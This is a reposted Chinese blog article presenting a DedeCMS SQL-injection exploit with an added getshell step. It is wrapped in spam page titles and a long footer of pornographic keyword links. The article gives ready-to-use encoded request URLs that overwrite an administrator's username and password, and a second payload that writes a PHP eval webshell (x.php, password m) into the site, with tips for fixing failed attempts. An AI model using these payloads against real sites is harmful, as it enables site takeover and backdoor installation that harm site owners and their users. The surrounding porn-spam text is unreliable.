婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網站建設 > 建站知識 > dedecms最新版本修改任意管理員漏洞+getshell+exp【配

dedecms最新版本修改任意管理員漏洞+getshell+exp【配

POST TIME:2017-11-13 00:49

此漏洞無視gpc轉義,過80sec注入防御。

補充下,不用擔心后臺找不到。這只是一個demo,都能修改任意數據庫了,還怕拿不到SHELL?

起因是全局變量$GLOBALS可以被任意修改,隨便看了下,漏洞一堆,我只找了一處。

include/dedesql.class.php

  1. if(isset($GLOBALS['arrs1']))
  2. {
  3. $v1=$v2='';
  4. for($i=0;isset($arrs1[$i]);$i++)
  5. {
  6. $v1.=chr($arrs1[$i]);
  7. }
  8. for($i=0;isset($arrs2[$i]);$i++)
  9. {
  10. $v2.=chr($arrs2[$i]);//解碼ascii
  11. }
  12. $GLOBALS[$v1].=$v2;//注意這里不是覆蓋,是+
  13. }
  1. functionSetQuery($sql)
  2. {
  3. $prefix="ddmx_";
  4. $sql=str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);//看到這里無話可說,不明白為什么要這樣做。
  5. $this->queryString=$sql;
  6. }

另外說下繞過80sec防注入的方法。
同一文件中,有兩個執行SQL的函數。ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2執行SQL并沒有防注入,于是隨便找個用ExecuteNoneQuery2執行的文件。

plus/download.php

  1. elseif($open==1)
  2. {
  3. $id=isset($id)&&is_numeric($id)?$id:0;
  4. $link=base64_decode(urldecode($link));
  5. $hash=md5($link);
  6. //這里的#@_是可以控制的
  7. $rs=$dsql->ExecuteNoneQuery2("UPDATE`ddmx_downloads`SETdownloadsdownloads=downloads+1WHEREhash='$hash'");
  8. if($rs<=0){$query="INSERTINTO`ddmx_downloads`(`hash`,`id`,`downloads`)VALUES('$hash','$id',1);";$dsql->ExecNoneQuery($query);
  9. }
  10. header("location:$link");
  11. exit();
  12. }

構造SQL語句 (提交的時候用ascii加密,程序會幫我們自動解密的,所以無視gpc):

  1. admin`SET`userid`='spider',`pwd`='f297a57a5a743894a0e4'whereid=1#

完整SQL語句:

  1. UPDATE`dede_admin`SET`userid`='spider',`pwd`='f297a57a5a743894a0e4'whereid=1#_downloads`SETdownloadsdownloads=downloads+1WHEREhash='$hash'
  1. http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出問題,后臺登錄用戶spider密碼admin
漏洞真的不止一處,各種包含,遠程代碼執行,很多,列位慢慢研究。

如果找不到后臺,參見以前修改數據庫直接拿SHELL的方法

  1. UPDATE`dede_mytag`SET`normbody`='{dede:php}file_put_contents(''spider.php'',''<!--?phpeval($_POST[spider]);?-->'');{/dede:php}'WHERE`aid`=1LIMIT1;

getshell:

  1. http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

會在plus目錄生成 x.php 密碼 m

http://127.0.0.1/plus/x.php

update成功后還要訪問下 /plus/mytag_js.php/aid=1

失敗原因:

測試發現,如果aid為空或已經生成過一次,則會寫shell失敗….更改倒數第三個ascii改變改變aid(即&arrs2[]=49)
配圖:

1.查看dede當前版本

2.執行exp

3.測試登陸后臺

spider密碼admin


原作者:imspider

本博客測試+配圖+getshell

本文來源:unhonker 原文鏈接



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
欧美一级高清片| 久久国产福利国产秒拍| 欧美一区二区视频观看视频| 日韩精品五月天| 亚洲伦理在线免费看| 26uuu久久综合| 欧美午夜电影网| 99久久精品国产导航| 国内成人免费视频| 久久91精品国产91久久小草| 亚洲一二三四区不卡| 国产精品国产三级国产aⅴ入口| 欧美日韩一级二级| 在线观看欧美精品| 色噜噜狠狠色综合中国| 91麻豆高清视频| av网站免费线看精品| 成人黄色大片在线观看| 懂色av一区二区在线播放| 狠狠久久亚洲欧美| 激情av综合网| 国产在线麻豆精品观看| 国产米奇在线777精品观看| 免费在线一区观看| 六月丁香综合在线视频| 日本成人中文字幕| 亚洲大型综合色站| 亚洲国产精品久久艾草纯爱| 亚洲国产aⅴ天堂久久| 爽爽淫人综合网网站| 视频一区二区三区入口| 五月激情综合网| 免费日韩伦理电影| 精品一区二区三区视频在线观看| 看国产成人h片视频| 亚洲第一狼人社区| 亚洲午夜久久久久久久久电影院| 亚洲va欧美va天堂v国产综合| 五月婷婷综合网| 久久国产精品99久久久久久老狼| 精品一区二区三区视频在线观看| 成人污视频在线观看| 色婷婷国产精品| 欧美日韩第一区日日骚| www国产精品av| 欧美激情一区二区三区不卡| **性色生活片久久毛片| 日韩中文字幕1| 国产在线视频不卡二| 91欧美一区二区| 欧美一区二区三区四区高清| 久久久亚洲精品石原莉奈| 中文字幕日本乱码精品影院| 无码av免费一区二区三区试看| 日韩av中文字幕一区二区| 国产成人无遮挡在线视频| 91久久香蕉国产日韩欧美9色| 日韩一区二区三区在线视频| 欧美国产激情一区二区三区蜜月| 亚洲第一av色| 成人av资源下载| 日韩一级二级三级| 亚洲一区视频在线观看视频| 五月激情六月综合| 国产精品中文有码| 欧美日韩精品一区二区| 中文字幕不卡在线| 麻豆中文一区二区| 欧美视频在线一区| 中文字幕精品一区二区精品绿巨人| 午夜视频一区在线观看| 成人精品国产福利| 日韩欧美一区二区不卡| 国产日韩欧美激情| 久久99国产精品久久99果冻传媒| www.66久久| 国产日韩欧美高清在线| 一二三四区精品视频| 99久久伊人久久99| 中文字幕va一区二区三区| 欧美aaaaa成人免费观看视频| 91成人免费在线视频| 久久综合久久综合九色| 青青国产91久久久久久| 欧美三级一区二区| 国产亚洲欧美日韩俺去了| 偷拍亚洲欧洲综合| 欧美影院午夜播放| 亚洲日本在线天堂| 一本大道久久a久久综合婷婷| 国产精品天美传媒| 成人性生交大片免费看在线播放 | 欧美一级国产精品| 国产精品人成在线观看免费| 国产呦精品一区二区三区网站| 欧美精品自拍偷拍| 亚洲与欧洲av电影| 欧美日韩三级在线| 日韩二区在线观看| 欧美一区二区三区视频在线| 免费在线看一区| 日韩一级大片在线| 亚洲精品视频自拍| 欧美在线一二三四区| 亚洲第一成年网| 欧美夫妻性生活| 国产综合色视频| 久久久美女毛片| 极品少妇一区二区| 国产精品久久久久久亚洲毛片| av在线播放不卡| 亚洲一区二区精品视频| 欧美日本不卡视频| 奇米一区二区三区av| 亚洲精品一区二区三区99| 国产一区视频导航| 成人欧美一区二区三区视频网页 | 精品日产卡一卡二卡麻豆| 欧亚洲嫩模精品一区三区| 欧美老肥妇做.爰bbww| 精品久久免费看| 国产精品久久久99| 天天操天天干天天综合网| 亚洲久本草在线中文字幕| 国产一区二区成人久久免费影院 | 综合自拍亚洲综合图不卡区| av中文字幕一区| 亚洲欧洲成人av每日更新| 欧美日韩亚洲国产综合| 极品美女销魂一区二区三区| 最新不卡av在线| 日韩午夜小视频| av激情亚洲男人天堂| 欧美—级在线免费片| 国产乱人伦偷精品视频不卡| 亚洲免费在线看| 国产精品高潮久久久久无| 久久久久久久国产精品影院| 91精品欧美综合在线观看最新| 91久久精品一区二区| 99精品国产99久久久久久白柏 | 国产一区二区视频在线| 日韩电影在线看| 亚洲国产精品久久久久秋霞影院 | 日本不卡一区二区三区高清视频| 亚洲免费av高清| 亚洲另类色综合网站| 国产精品乱码人人做人人爱| 国产欧美日韩卡一| 一区视频在线播放| 亚洲欧洲国产专区| 亚洲激情网站免费观看| 一区二区三区日韩欧美| 亚洲国产日产av| 午夜精品久久久久久| 亚洲v中文字幕| 欧美96一区二区免费视频| 裸体一区二区三区| 国产精品亚洲第一区在线暖暖韩国| 国产精品一级黄| 91免费观看国产| 欧美精品日韩精品| 欧美大片在线观看| 国产女人18水真多18精品一级做| 中文在线免费一区三区高中清不卡| 中文av一区二区| 亚洲精品国产高清久久伦理二区| 亚洲午夜激情网页| 美女www一区二区| 成人午夜私人影院| 欧美亚洲综合色| 日韩午夜在线观看视频| 国产免费久久精品| 亚洲已满18点击进入久久| 麻豆成人综合网| 一本大道久久a久久综合| 日韩一级片网址| 国产精品丝袜久久久久久app| 悠悠色在线精品| 国内不卡的二区三区中文字幕| 91亚洲精品一区二区乱码| 91精品午夜视频| 国产精品久久久久四虎| 亚洲电影欧美电影有声小说| 国产福利一区二区三区| 欧美三级乱人伦电影| www国产成人免费观看视频 深夜成人网| 国产精品福利一区| 麻豆国产精品官网| 色偷偷成人一区二区三区91| 亚洲精品一区二区三区四区高清| 亚洲欧洲性图库| 激情综合亚洲精品| 欧美日韩视频不卡| 中文字幕在线一区免费| 老司机精品视频导航| 在线观看免费成人| 中文字幕在线视频一区| 久久av老司机精品网站导航| 欧美日韩在线综合|